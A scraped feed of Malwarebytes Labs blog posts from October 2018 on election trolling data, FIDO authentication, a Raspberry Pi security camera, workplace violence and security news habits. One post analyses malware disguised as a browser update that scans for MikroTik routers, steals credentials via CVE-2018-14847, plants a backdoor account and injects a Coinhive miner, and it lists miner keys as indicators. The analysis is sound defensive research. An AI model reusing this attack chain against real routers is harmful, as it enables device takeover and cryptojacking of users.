Techie Feeds

Information operations on Twitter: new data released on election tampering

Malwarebytes - Thu, 10/18/2018 - 15:00

Back in April, we talked about the wealth of options available to Russian hackers and others launching social engineering campaigns, whether on social networks or through clever attacks launched via Advanced Persistent Threats. Some of that was information published by Twitter at the time in relation to election tampering/interference by so-called “Russian Troll farms”—specifically, the IRA (Internet Research Agency).

Some of the numbers involved were already impressive: 3,841 accounts were linked to the IRA and around 1.6 million notifications were sent out to people who had interacted with these accounts in some way. At the tail end of 2018, Twitter has released yet more data related to this particular campaign.

For example, there’s now an additional 770 accounts (potentially from Iran) to sit alongside the original 3,841 from Russia. That includes “10 million Tweets and 2 million images, GIFs, videos, and periscope broadcasts.” Some of the oldest accounts date back to 2009.

All of this has been put onto an “Elections Integrity” portal by Twitter for researchers to investigate further. That’s 1.24GB of Tweet information and 296GB of media data across 302 archives for the IRA, and 168MB of Tweet information and 65.7GB of media across 52 archives for what’s being referred  to as “Iran.”

DFRLab are one of the organisations given access to the data ahead of time, and the story has recently broken elsewhere, so expect many updates and developments over the next few days. As Ben Nimmo puts it:

They were about the home government first 

– had multiple goals 

– targeted specific activist communities 

– apolitical 

– opportunistic 

– evolved 

– not always high-impact

The timeline of the Tweets is fascinating, as are the posting habits of both Russian and Iranian groups. For example, some individual accounts developed a “personality,” while others just attempted to trend fake stories. That thread is going to grow and grow, so you may wish to bookmark it for easy reference.

Meanwhile,DFRLab are going to be publishing a series of Medium blogs on their findings in more detail. The first is already live, and covers seven key takeaways from the research done so far.

Any doubts you may have had about the likelihood of large scale, long term, professional troll campaigns should have just been swept away. There is no doubt: This is indeed a “full fledged influence op,” and it raises many questions about what’s put into the social sphere, and (more importantly) what we do with it once viewed alongside a response from the platform itself.

We’ve already seen how Russian Facebook ads were used to try and divide opinion in the run up to the 2016 US elections, and it’s clear no expense was spared and no major platform was ignored in the quest to troll the public at large. Everyone needs to step up their game, from the people unwittingly republishing state-sanctioned social engineering ops to the platforms we use on a daily basis possessing the ability to do something about it.

The post Information operations on Twitter: new data released on election tampering appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Is FIDO the future instrument to prove our identity?

Malwarebytes - Wed, 10/17/2018 - 16:52

FIDO, short for Fast IDentity Online, is an industry consortium started in 2013 to address the lack of interoperability among strong authentication devices and the problems users face creating and remembering multiple usernames and passwords. Among the founders were those who work in the financial sector, device manufacturers, and providers of authentication solutions.

What is FIDO?

According to the FIDO Alliance website, FIDO is a set of open and scalable standards that enable simpler and more secure user authentication experiences across many websites and mobile services.

FIDO set out to make authentication devices easier to use and fix the conflicts between devices from different vendors. Their goal is to provide a set of specifications for the entire range of authentication techniques. These specifications should then provide a standard for the entire industry leading to better compatibility and more ease of use.

Logging in

Currently, there are a variety of options for users to log in to their services and devices. We have discussed the basics of two-factor authentication (2FA) in the past, and almost everyone agrees that it is impractical to remember 27 or more passwords and usernames for individual accounts—nor is it safe to re-use passwords through multiple accounts. So, what are our options for logging in?

The most common ones are divided up into these categories:

  • The classic username and password combination
  • Knowing a PIN or TAN code (ATM withdrawals, money transfers)
  • Having access to an email account (when verification codes are sent by mail) or mobile device (texted codes)
  • Secret questions (often frowned upon as they are sometimes easy to guess, or easy to obtain through phishing)
  • Physical keys (card readers, USB keys)
  • Biometrics (fingerprint readers, iris scanners, voice recognition)
  • Mobile devices that can scan barcodes or QR codes and calculate a login code for one time use (Authy, Google Authenticator)
  • Already being logged in to a verified account (e.g. Facebook login)
Problems and solutions

As FIDO seeks to standardize authentication protocols for the wide range of login options listed above, they must identify techniques that are problematic from a security standpoint and look for solutions.

One of the problems with many of the login options is the use of shared secrets, meaning that both the user and the software that checks the login need to know the correct answers. You might be able to keep a secret, but your software could be fooled into handing over all your information to attackers. On a regular basis they succeed in breaching a sites’ or services’ security and obtaining a multitude of login credentials.

One solution for this problem is to use asymmetric cryptography. Basically, a user creates two different keys, a private and a public key. When a user proves that he has the private key by responding to a challenge, the service or website can check the answer that the user provided to the challenge by using the public key, which the user provided the website or service with when he signed up. As a handshake, the server asks the user a question based on the public key that only the holder of the private key can answer. But the answer does not give away the actual private key.

The challenge is created especially for that login attempt, so the answer can’t be used for another login with the same service or a different service. This way, the user is the only one that can answer the challenge and the only one that has access to both keys.

Advantages and disadvantages

The advantages of using asymmetric cryptography are clear:

  • It’s easy to use without having to remember a password.
  • Strong asymmetric encryption can’t be brute forced, unlike weak passwords.
  • The same key combination can be used for multiple logins (not to be confused with the challenge question, which is uniquely generated for each login attempt).
  • It’s impossible to steal from websites and services, even using Man-in-the-Middle attacks, because the private key is never sent across the Internet.

A major set-back could be if the user should ever give their private key to a third party, for example, because she lost it or because she was a victim of a phishing attack that asked directly for the private key. In such a case, having used this method across a multitude of sites and services means the user is in for a multitude of problems: each service she signed in with using this combo could be compromised.

What does FIDO have to do with this?

The FIDO Alliance hosts the open authentication standard FIDO2, which enables strong, passwordless authentication built on public key cryptography using hardware devices like security keys, mobile phones, and other built-in devices. It does this using both the W3C Web Authentication specification (WebAuthn API) and the Client to Authentication Protocol (CTAP), a protocol used for communication between a client (the browser) or a platform (the operating system) and an external authenticator, i.e., the hardware security key.

With these capabilities, the hardware security key can replace weak, static username/password credentials with strong, hardware-backed public/private-key credentials.

Because FIDO2 is an open standard, the security device can be designed for existing hardware, such as phones or computers, and for many authentication modalities. In addition, it can be used for different communication methods, such as USB, Bluetooth, and Near Field Communication (NFC), which allows for contactless authentication to take place safely from many systems and devices.

FIDO2 can be enhanced further still for organizations requiring a higher level of security, as it supports the use of a hardware authentication device with a PIN, biometric, or gesture for additional protection.

Proving your identity in the future

Where FIDO has enabled the industry to make steps toward a safer method of online authentication, it is still far from being the standard it sets out to be. The current usage of FIDO is limited to high-end applications and organizations.

And even though browsers and operating systems have started to develop built-in support for FIDO2, they are not ready for market yet. Also, a new Universal Server certification for servers that operates with all FIDO authenticator types (FIDO UAF, FIDO U2F, WebAuthn, and CTAP) is on its way. And even when those stages are complete, the websites and services that require a secure authentication method will probably need some convincing to start using this new format. And finally, only once early adopters have adapted to the technology and sung its praises will more mainstream usage follow suit.


Using asymmetric keys is the most logical and secure method to prove your identity right now, but it could very well be replaced by a blockchain technology. Given the rate of development in blockchain technology, especially compared to the relatively slow advances made in FIDO, this seems a likely scenario. And it doesn’t help that competing standards are created like the PCI-DSS, instead of bundling the efforts into creating an all-encompassing standard.

The one standard to rule them all will probably be the one that has the widest applicability. Being able to log in anywhere without the hassle of passwords almost sounds too good to be true, but the answers are out there. Hopefully, with the application of the best standard, we will see a future with less breaches and more peace of mind.

The post Is FIDO the future instrument to prove our identity? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to build your own motion-activated security camera

Malwarebytes - Tue, 10/16/2018 - 15:00

Attention makers! Are you looking for a challenging project that not only gets your gears grinding but helps to keep you secure while traveling? Welcome to the build-your-own security camera tutorial.

The impetus for this project originated from events that took place at Defcon 26, where hotel security staff inspected attendee rooms while not properly identifying themselves.

Gross overreach. Violation of your rights. Violation of your privacy. These are always good motivators. The whole story is well covered here.

So our goal is to build a motion-activated security camera that we can use to monitor our own hotel rooms, homes, or other locations. Let’s begin.

Choosing the hardware

While there does exist ready-made hardware that would satisfy my requirements, as a quick web search demonstrated, I would need to assess the security posture of each of these products. Whereas I can build satisfactory security into the hardware if I build it myself.

A selection of commercially available portable spy cameras.

Building such a device should be possible with open-source software and off-the-shelf components. This should be easy, right?

After a quick rummage through my spare parts bin, I found a first-generation Rasberry Pi.

Rasberry Pi classic

After some careful consideration, I elected to have the captured video and stills saved locally. This device is going to be deployed on the most hostile network ever, after all. I could hard wire it to the hotel network, or try and provide it with cellular connectivity maybe by using something like a nova global cellular modem.

I decided against it: Better to start small and limit the scope of the project. I can always add this functionality later, and using a cellular modem isn’t a guarantee that the network traffic will not be tampered with or intercepted.

After some research, I confirmed that the latest version of Rasbian (the official Rasberry Pi OS) still supports the original Rasberry Pi. Further digging yielded 16gb and 32gb SD cards. Both of these would be well suited to the task. I started by performing a fresh install of the Rasbian OS to confirm that everything is okay with this Rasberry Pi. It’s been a few years and I had forgotten exactly why it had been disused.

I downloaded the latest version of Rasbian here.

Software and tools

I then extracted the 2018-06-27-raspbian-stretch.img from the raspbian-2018-06-29/ file, and used Etcher to copy it to said SD card.

Etcher is a program that facilitates writing images to SD cards.

After inserting the SD card into the RPI and connecting a keyboard and monitor to it, I played around with it for a while. Once I was satisfied that, other than being a little old, everything was working, I added some heatsinks, as it is a cheap upgrade. I foresee the device running for several days in a row.

A simple heatsink kit available for the Rasberry Pi.

I also took the opportunity to verify the exact model of Rasberry Pi I had. This was achieved with the command: cat /proc/device-tree/model

The result was: Rasberry Pi Model b rev. 2

I also dug up a cheap USB webcam I already had. The plan was to use that to recycle old hardware and avoid additional costs. (More later on why this was not a good idea for this particular project.) The webcam I had kicking around was a Logitech LZ241DV. I Researched compatibility on It didn’t show much promise.

A quick cntrl + F search on the page listing the Rasberry Pi compatible webcams and typing in the model of the Logitech camera. Zero hits.

Choosing an OS

During my research for this project, it quickly became apparent that the most suited operating system for this project isn’t in fact Rasbian, but motioneyeOS.

motionEyeOS is, according to its github wiki, a Linux distribution that turns a single-board computer into a video surveillance system.

Not only is motioneyeOS specifically tailored to our task, but it has a Rasberry Pi–specific compiled version. I downloaded the appropriate versions for the hardware I have on hand.

I installed motioneyeOS on a different SD card, connected the USB camera, wired in a network cable, and plugged it into a test network I have in the lab.

To connect to the motioneyeOS Rasberry Pi, you can use a browser on any machine on the same network and simply type the IP address of the motioneyeOS Rasberry Pi into the browser. Then, you will be greeted with a web-based management interface.

Simple diagram showing the topology of the motioneyeOS Rasberry Pi in relation to the machine used to configure it via the web interface.

Once the Rasberry Pi was fully booted, I ran a quick Nmap scan of the network on a machine that also resides on the same network: nmap -sP

Example of the nmap command in bash to determine the IP address of the motioneyeOS

It is best to perform this nmap scan before and after turning the Rasberry Pi on. The new address shown by nmap will be the instance of motioneyeOS.

NB: This IP address can change between reboots!

The web-based interface for motioneyeOS, showing the USB camera garbled video

If you connect a monitor to the Raspberry Pi running motioneyeOS, it will also display its IP at the prompt. As we can see, the USB webcam doesn’t want to play video properly. I investigated on the web for a while, and tried routing the USB webcam through a powered hub. (This was one of the possible solutions I found online.) All to no avail.

At this point, to be thorough, I also downloaded the Raspberry Pi 3 image for motioneyeOS.

I flashed it on a 32gb micro SD card, temporarily decommissioned my retro gaming emulation project, and tested the USB webcam on a current and known working Raspberry Pi 3. (The cool thing about this is that restoring that project will only require swapping back my original micro SD card.)

Same results.

So the webcam isn’t going to work without some serious fiddling about. After giving this some more thought, I elected to buy the Raspberry Pi specific camera. If I’m going to have to buy a camera of some sort, best to get one made specific for the Rasberry Pi in the first place.

I settled on the Raspberry Pi Camera Module V2-8 Megapixel, 1080p. There are low light versions of these cameras, but I want the higher picture quality.


And this is where it gets messy. The module that came in the mail was either defective right out of the box, or I zapped it with static electricity early on.

I spent hours reinstalling Rasbian on the original Rasberry Pi, disconnecting and reconnecting the ribbon connector at both ends. I disconnected the camera module from the mini daughter board and reseated it. Reinstalled motioneyeOS, disconnecting and re-connecting the ribbon again. Repeated the whole process with the Rasberry Pi 3, both in Rasbian and motioneyeOS.

This confirmed that the camera module was indeed dead on arrival (DOA). Nothing I did yielded success. The best I could achieve was command line confirmation that the camera was present. The web interface of motioneyeOS always complained that the camera could not be initialized.

I decided to order a different camera module. I settled on the Keyestudio Camera Module 5MP REV 1.3 for Raspberry Pi. It is Rasberry Pi specific, but a different brand than my first attempt.

This solved all the problems, and I was met with success on the first boot attempt of the classic Rasberry Pi running motioneyeOS.

Successful video capture!

To have access to all the features and settings of motioneyeOS, you need to login as “admin.”

The username and password should be changed to something non-default when you deploy this in your hotel room.

I also disabled the FTP server, the samba server, and the SSH server. I want to reduce the surface of attack for this device as much as possible. I can either retrieve the desired footage directly from the micro SD card, or by re-enabling SSH afterwards.

If DHCP is enabled and the network cable is disconnected, the machine will boot loop as it tries to renew an IP address.

In the advanced settings, you can also enable motion notification. This is where you would enable the actions to take place should a motion be detected. This is also where you would configure the aforementioned nova cellular modem.

The final product

So there you have it. After some effort, we have a motion-activated security camera, built with off-the-shelf components and open-source software.

The finished product. (The screen is superfluous and was only used for configuration purposes.)

What lessons did we learn?

  • Don’t assume the hardware you have is working. It went in the junk pile for a reason. For example, I wasn’t able to up-cycle the USB webcam.
  • Micro SD memory cards are small and easily misplaced. (I lost one during this experiment!)
  • SD cards can fail. I used the SD memory card formatter from to confirm this.
  • Even new hardware can be defective. I had a defective Rasberry Pi camera. It failed right out of the box. This forced me to do a lot of detective work and test all the hardware.
  • This wound up being quite a bit more expensive than an off-the-shelf commercial product. It was a great learning experience, though.
What’s left to do?

I need to build a good case for my Frankenstein security camera, because static electricity is a definitive concern here. Exposed electronics is a not a good thing. Also the security staff, should it actually visit your room, might be alarmed at seeing a hodge podge of components and wires sitting on a desk.

There are several articles on the web describing how to build and deploy motioneyeOS on a Rasberry Pi. I always find that they never give you the full story. Failures, both in hardware and software configurations, are an opportunity to learn.

The post How to build your own motion-activated security camera appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 8 – 14)

Malwarebytes - Mon, 10/15/2018 - 15:56

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 8 – 14) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs Cybercrime Tactics and Techniques Report (CTNT) shows shift to business targets in Q3

Malwarebytes - Mon, 10/15/2018 - 07:01

Once again, it’s that time of year: time for the quarterly Malwarebytes Labs Cybercrime Tactics and Techniques Report. Strap in your seat belts, folks, because the third quarter of 2018 was quite a wild ride.

After a sleepy first two quarters, cybercriminals shook out the cobwebs and revved up their engines in Q3 2018. With cryptominers and exploit kits maturing, ransomware ramping up with steady, sophisticated attacks, and banking Trojans experiencing a renaissance, we’re having one heck of a season. Attack vectors were at their most creative—and most difficult to remediate—especially for businesses.

In fact, businesses saw far more action this quarter than consumers—their total detections trended upwards by 55 percent, while consumer detections increased only by 4 percent quarter over quarter. It looks like threat actors are searching for more bang for their buck, and business targets are returning more value for their efforts. Banking Trojans and ransomware, traditionally aimed at both businesses and consumers, leaned much harder into their business targets this quarter. Even malware that’s generally favored consumers, such as cryptominers and adware, seems to have graduated to a more professional prey.

Consumers didn’t get away from Q3 unscathed, however. They saw a whole lot of scam action this quarter, especially the ever-classic sexploitation technique, but this time it came with a twist—scammers used stale personally identifiable information (PII) likely pulled from breaches of old to scare users into action. And although the bad guys were up to no good, we at Malwarebytes had a field day taking a bunch of them down.

So how did we draw our conclusions for this report? As we’ve done for the last several quarterly reports, we combined intel and statistics gathered from July through September 2018 from our Intelligence, Research, and Data Science teams with telemetry from both our consumer and business products, which are deployed on millions of machines.

If you want to learn more about the key developments in cybercrime last quarter, including the latest threats, newest attack methods, noteworthy scams, and predictions for Q4 cybercrime trends, check out the full Malwarebytes Labs Cybercrime Tactics and Techniques Report.

The post Malwarebytes Labs Cybercrime Tactics and Techniques Report (CTNT) shows shift to business targets in Q3 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Workplace violence: the forgotten insider threat

Malwarebytes - Fri, 10/12/2018 - 16:00

Organizations are no stranger to insider threats. In fact, for those who have been around long before the Internet, workplace violence, (alongside spying) is a problem many businesses have seen before and sought to address.

However, the adoption and use of the Internet completely changed the way organizations run and grow their businesses, how customers can communicate with companies, and how employees do their jobs. And with this advancement—as we’re well aware by now—comes new, more sophisticated challenges that can compound the risks that organizations face from insiders.

When it comes to security, many enterprises are focused on beefing up their system and network defenses to keep outside hackers from getting their hands on digital assets. In addition, organizations are now more aware of the threat that malicious insiders pose—whether that’s stealing proprietary information or spying for competitors. Yet it seems that little or no attention is given to addressing workplace violence as a whole.

An overview of workplace violence

In our previous blog on insider threats, we defined workplace violence (WPV) as “violence or threat of violence against employees and/or themselves.” This can manifest in the form of physical attacks, threatening or intimidating behavior and speech (written, verbal, or electronically transmitted), harassment, property damage, or other acts that could put people at risk.

Early signs of potential for violence include threats of bodily harm (often framed as a joke, a passing comment, or a verbalization of violent thoughts), insults, passive-aggressive actions, dramatic or unreasonable demands, withdrawal (especially if they used to be sociable), and sudden undue whining or complaining. Other manifestations may not be evident at first, too.

Knowing this, one might think it is essential for organizations of any size to be able to identify and tackle workplace violence head on, on top of improving their network defenses. Sadly, this isn’t the case.

Although organizations are required by law to keep employees safe by creating a healthy, hazard-free workplace environment, almost half of executives in a corporate survey conducted by TAL Global, a security and risk management company, believe that “workplace violence is not an issue that needs to be addressed.” It’s also frustrating to note that more than half of these executives “do not believe that workplace violence will create a negative impact on their budget.”

This is a serious oversight, especially when the Department of Justice estimates that workplace violence costs US businesses about $36 billion per year in lost productivity, property, and most importantly, employee lives.

The workplace, redefined

While we’re about WPV, it’s important to remind ourselves that the definition of “workplace” has evolved over time and is no longer confined within the walls of a traditional office building. Today, the workplace can be your home, your favorite coffee shop, the local library, or even a co-working space.

Over the last decade, the number of telecommuting workers has increased by 115 percent, according to a 2017 report from Global Workplace Analytics and FlexJobs. And while working from home is beneficial for both employees and employers, it also comes with its own risks.

While organizations must be sure to protect their sensitive client and company data accessed outside of the office network by remote workers, they also have to ensure workplace security in the telecommuter’s home office.

Why? Because a home office, according to the Occupational Safety and Health Administration, is still under the employer’s jurisdiction. Therefore, they must make sure that home offices are safe and hazard-free. This could also mean that policies governing workplace violence could be adapted from the office to the home office.

Is workplace violence on the rise?

Perhaps. The TL;DR answer to that question is this: It depends on the industry (e.g., incidents of workplace violence in healthcare are far more common than in other industries) or the type of violent incident (e.g., non-fatal assaults have decreased while workplace homicides have increased).

Regardless of whether WPV has decreased or increased, it’s clear that the issue needs addressing. The promotion and adherence to the “It wouldn’t happen to us!” myth didn’t save organizations from hackers breaching their systems, so why should it keep them from WPV incidents?

Read: 5 cybersecurity questions retailers must ask to protect their businesses

Types of WPV

Talking about workplace violence may conjure up highly-publicized images of active shooters stationed on campus. Let us keep in mind, however, that not all workplace violence events happen this way. According to Steve Crimando, an expert in the field of threat assessment and threat management, there are five current types we all need to familiarize ourselves with. They are:

  • Criminal intent. This type usually involves criminals who target establishments, often, with the intent to steal. Robbers and shoplifters belong to this type.
  • Customer/Client. This type is perpetrated by customers or patients (including their relatives) against one or more workers servicing them. Verbal abuse against workers in healthcare and social services is an example.
  • Worker-to-worker. This is probably the type employees can relate to the most. These acts of violence can be perpetrated by either current or former employees toward one or more other employees of an organization. Workplace bullying is an example of this type.
  • Domestic violence. More commonly, women have been victims of domestic violence in the workplace, but that isn’t to say that this doesn’t happen to men.
  • Ideological violence. This type could either be perpetrated by radicalized employees or external actors targeting organizations, its people, and properties for reasons related to their ideology, politics, or religion. Active shootings and terrorist attacks are examples that fall under this type.

Some organizations only partially recognize stalking and cyberbullying as workplace violence, but we’d consider them to be as well.

Practical ways organizations can help address WPV

Marianne Alvarez, co-founder and director of training at the ALICE (Alert, Lockdown, Inform, Counter, Evaluate) Training Institute in California, has provided tips on how organizations can prepare themselves for potential incidents of workplace violence. Her recommendations include:


Organizations must check the overall health of the organization’s safety and physical security. This may involve hiring a certified risk assessment professional who can conduct a full onsite evaluation of security gaps or weaknesses the business may have to address. The risk assessment professional inspects infrastructure weaknesses (locks, CCTV cameras, etc.) and prevention and training programs that are in place to see if these need to be enhanced as well.


Once the risks and weaknesses are identified, the organization can then prioritize which ones to address first. During the prioritize phase, they should also set a plan and a budget.


Organizations must continue training—or in some cases, re-training—their employees on how to how to respond to incidents of workplace violence, whether it be a full-blown shouting match between two workers or an incident involving aggressive intruders.

It’s imperative that companies stress the importance of preventing the escalation of a negative encounter in the workplace to an active shooting event.

“The training should include a blended model of classroom-type learning, a test to ensure learning, and drills to practice what they learned,” said Alvarez. “Much like CPR, one must be able to apply the appropriate concepts while under the pressure of a critical event. The only way to ensure this is to repeat the practice of the concepts in live drills.”

When work life bleeds into personal life

Modern-day workers have come to perceive and accept their work lives as something inseparable from their personal lives. It’s a mindset and lifestyle prevalent to those working in tech industry hotspots like Silicon Valley, as well as financial hubs such as Wall Street. So feeling like a failure in work could make one feel like a failure in life.

“An employee can feel that they give their all to a company, making employment feel like less of a job and more a way of life,” said Leslie Garcia, CEO of Executech Security Solutions. “When not recognized for their efforts or terminated for poor work performance, this could possibly trigger a retaliatory emotional and potentially dangerous physical response.”

It’s vital to address vulnerabilities in systems that endanger valuable data. However, it is equally important to take care of the people under organizations’ watch. Ideally, an overall workplace security posture—that which covers the protection and safety of the business’s infrastructure, tangible assets, digital assets, and its people—coupled with a culture that intentionally ingrains security behaviors, awareness, and proper reporting practices—would be able to mitigate workplace violence as well.

In the face of workplace violence, these are thoughts organizations must ponder, recognize, accept, and take action on. The lives of their employees depend on it.

Recommended reading:

The post Workplace violence: the forgotten insider threat appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake browser update seeks to compromise more MikroTik routers

Malwarebytes - Fri, 10/12/2018 - 15:00

This blog post was authored by @hasherezade and Jérôme Segura.

MikroTik, a Latvian company that makes routers and ISP wireless systems, has been dealing with several vulnerabilities affecting its products’ operating system over the past few months. Ever since a critical flaw in RouterOS was identified in late April 2018, attacks have been going on at an alarming rate, made worse when a newly-found exploitation technique for CVE-2018-14847 was identified.

Part of the problem is that a large number of MikroTik routers remain unpatched and are prey for automated attacks, despite security fixes made available by the vendor. Criminals were quick to leverage Proof of Concept code to compromise hundreds of thousands of devices in a short time frame. Last summer, researchers at SpiderLabs discovered what was perhaps the biggest malicious Coinhive campaign via hacked MikroTik devices, which has evolved into a much wider problem now.

With this latest trick, users behind compromised routers are served a fake browser update page. When they run this malicious update, it unpacks code onto their computer that scans the Internet for other vulnerable routers and tries to exploit them.

Suspicious browser update

Security researcher @VriesHd first spotted a new campaign attempting to further compromise vulnerable routers using a typical social engineering technique. Internet providers that operate infected MikroTik routers will serve this malicious redirect about an “old version of the browser” to their end users:

According to a search via Censys, there are about 11,000 compromised MikroTik devices hosting this fake download page:

The alleged browser update is suspiciously downloaded from an FTP server, as seen below:

Interestingly, this IP address is also listed as a free and open web proxy. Proxies are often used by those who wish to bypass certain country limitations (i.e. watching the American version of Netflix if you are not in the US) or simply as a way to mask their IP address.

Payload analysis

Behavioral analysis

The payload follows the theme of pretending to be an installer named upd_browser.

When we deploy it, it pops up an error:

However, if we capture the network traffic, we can see that in the background it scans various IP addresses, trying to connect on port 8291 (a default port for managing MicroTik routers via Winbox application):


The dropped payload is a relatively big executable (7.25 MB) with a huge overlay. The sections’ headers and their visualizations are given below:

As we can recognize by looking at the sections names, it comes packed by a popular, simple packer: UPX. The size of overlay suggests that there is something more to be extracted. After further examination, we find out that it unpacks a Python DLL and other related files into the %TEMP% folder, and then loads them. At this point, it is easy to guess that this EXE is in reality a wrapped Python script. We can unpack it following the same procedure as the one described here.

The Entry Point is in the script named upd_browser. After decompiling and following the scripts, we find out that the malware’s core consists of two Python scripts: and

Inside the scripts

The main function of the module is pretty simple:

As we can see, the error pop-up is hardcoded: It does not alert about any actual error, but is used as a decoy.

After that, the malware logs the IP address of the victim by querying a hardcoded address of a tracker made using a legitimate service, IP Logger. The tracker takes the form of a one pixel–sized image:

Later, this address is queried repeatedly in a defined time interval.

The most important actions are performed in the function named “scan” that is deployed in several parallel threads (the maximum number of threads is defined as thmax = 600). The function “scan” generates pseudo-random IP addresses and tries to connect to each of them on the aforementioned port 8291. When the attempt of connecting is successful, it tries another connection, this time on a random port from a range of 56778 to 56887. When this one fails, it proceeds with the exploitation:

The function “poc” is meant to infect the router using known vulnerabilities. It starts by attempting to retrieve credentials leveraging the path traversal vulnerability (CVE-2018-14847):

The user.dat file is expected to be in M2 format, so the script comes with a built-in parser (function load_file):

If retrieving the password from user.dat file is successful, it decodes the credentials and uses them to create a backdoor: an account with a randomly-generated password. It also sets a scheduled task to be executed by the router.

The script that is set in the scheduler is generated from a hardcoded template (cleaned version available here). Its role is to manipulate the router’s settings and set up an error page loading a CoinHive miner.

The error page can be dropped in two locations: “webproxy/error.html” or “flash/webproxy/error.html” .

Such a page is displayed to users whenever they try to view a URL to which the access is denied. But the malicious script configured in the router in such a way that basically any HTTP request leads to the error. Yet, the error page is crafted to spoof the original traffic, displaying the requested page as an iframe. So, users may browse most of the web as usual, without noticing the change. Example:

The CoinHive miner is embedded, so during the time this time their machines are used for mining purposes.


MikroTik users are urged to patch their routers as soon as possible and should assume that their authentication credentials have been compromised if they are running an outdated version. MikroTik’s download page explains how to perform an upgrade to RouterOS.

Awareness that these vulnerabilities exist and are easy to exploit is important considering that patching a router is not something many people are used to doing. However, in many cases users will not be able to do so unless their Internet Service Provider does it for them upstream.

With this latest social engineering scheme, we saw how criminals are trying to infect regular users and leverage their computer to scan the Internet for vulnerable routers. This technique is clever because such an effort requires time and resources to be efficient.

Malwarebytes business customers and Premium consumer users are protected from this threat, as our anti-malware engine detects and blocks this fake browser update in real time:

Malwarebytes Endpoint Protection blocks the malicious executable disguised as a browser update.

Indicators of compromise

Sample hash


Coinhive site keys

oiKAGEslcNfjfgxTMrxKGMJvh436ypIM 5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx 5ROof564mEBQsYzCqee0M2LplLBEApCv qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf joy1MQSiGgGHos78FarfEGIuM5Ig7l8h ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma

The post Fake browser update seeks to compromise more MikroTik routers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

6 ways to keep up with cybersecurity without going crazy

Malwarebytes - Thu, 10/11/2018 - 15:00

As we dive headfirst into National Cybersecurity Awareness Month, it seems only fitting to discuss ways to stay on top of developments in modern cybersecurity and privacy. What’s the best way to stay protected? How can you determine if something is a scam? Which big company has been breached now?

The topic of security features heavily across many industries, blogs, and news channels simply because of the current state of affairs. It seems like every day we hear about a new major data breach, affecting thousands—if not millions—of people. From retailers like Target to social media sites such as Facebook to more prominent credit agencies like Equifax—no one is safe.

The uncontrolled nature of attacks coupled with the 24/7 news cycle make it downright overwhelming to keep up with all the cybersecurity information lobbed at us. The widespread release of new attacks, data breaches, systems failures, and malware use have led many to a feeling of security fatigue. We’re essentially all at a point where we’re sick and tired of hearing about it, and frankly disappointed in many companies and individuals who continually fail to protect the data they are responsible for.

Fatigue or not, we shouldn’t collectively ignore what’s happening in the world of cybersecurity right now. We all have a duty to not only protect ourselves, but also our communities, countries, and world over by staying in the know. You can contribute by keeping your knowledge up-to-date and employing a few simple strategies to capture the good information out there and weed out the bad.

1. Follow security professionals and influencers

We live in the information age, where knowledge is digital, recorded and streamed for posterity, stored in giant servers, and available at the entry of a search term. You can acquire new information and expand your knowledge in a variety of ways, according to your preferred methods.

For example, you can glean information from more traditional sources such as news websites and blogs from security experts, but you can also turn to social media, attend webinars and conferences, or communicate directly with someone well-versed in the field.

You could even bring it up at the office water cooler or by making small talk with parents at your child’s school—cybersecurity is covered so much in the media now that it’s become fodder for mainstream chatter. Many will happily discuss more than the just latest breach, possibly drawing up a debate on which security solution is the best or offering up ways in which you can protect yourself from attack.

Whatever you choose, you’ll want to follow some of the top security professionals for the best guidance. Some of my favorites include:

2. Browse security-related social media topics

Most social media networks are great resources for digging up additional content, such as news stories (real ones), videos, opinions, and other posts. In addition, they’re home to a treasure trove of supplemental information on local, national, and global events, career opportunities, top cybersecurity businesses, and more. Of course, social media is not the only place you’ll want to acquire information from, but it can serve as a complement to some of the other channels on this list.

Twitter is especially useful if you know which trends and hashtags to search, as well as who to follow. It allows you to see discussions about current events in real time so you can be right there, in the moment, when things play out.

Twitter lists are also great for creating a niche content feed. You can specify which security vendors, influencers, and developers you’d like to be in your list (or lists), and filter Tweets accordingly. Lists have the added benefit of weeding out noise not pertinent to a particular group—you can focus on a single topic or community.

3. Attend live events

Believe it or not, there’s a huge market for live, in-person cybersecurity events. This includes so much more than conferences, or “cons.” You might also attend lectures, discussions, workshops, networking events, educational courses, or sponsored meet ups.

Web-based events present another great avenue, such as webinars and online community conference calls. Some of the best live cybersecurity speakers will attend such events or be asked to participate, and it stands to reason you can learn a lot from any one of them.

So how do you find such events? You have to keep a pulse on when, where, and what’s happening around you. Local newspapers are great resources for event listings. And of course, there’s always trusty-old Google. Luckily, some of the other channels mentioned in this article will also help keep you informed.

4. Check vulnerability and risk advisory feeds

One cannot overstate the need to remain aware of security vulnerabilities discovered in both new and old technologies—especially for business owners. Web browsers, apps, software, operating systems, and a variety of the personal or professional tools you use may have been compromised or attacked.

You should make a habit of checking vulnerability alert feeds and advisory sites to ensure the protection of your personal and corporate data. Here’s a quick list:

If regularly checking these feeds feels overwhelming, another approach would be to simply keep your programs updated at all times so there’s no chance a cybercriminal can exploit the vulnerability and gain access to your machine.

5. Listen to a podcast

We all lead busy lives—maybe you don’t have time to read article after article. But what about the time you spend driving, walking, or traveling? Podcasts fill this time nicely, as you can listen to them on-the-go and multi-task while doing so.

Podcasts can be found—and listened to—through a variety of channels, including media apps, music libraries such as iTunes or Spotify, Amazon, or even YouTube.

6. Customize your own real-time alerts

Using a tool such as IFTTT—which stands for If This Then That—you can set up customized alerts for all things cybersecurity.

The subreddit r/netsec, for example, is one of the most popular curated forums for cybersecurity news and information. You can configure IFTTT so it sends you push notifications or emails when something gains popularity on the subreddit. The headlines will populate in the taskbar of your mobile device allowing you to gauge whether or not the story is worth your time.

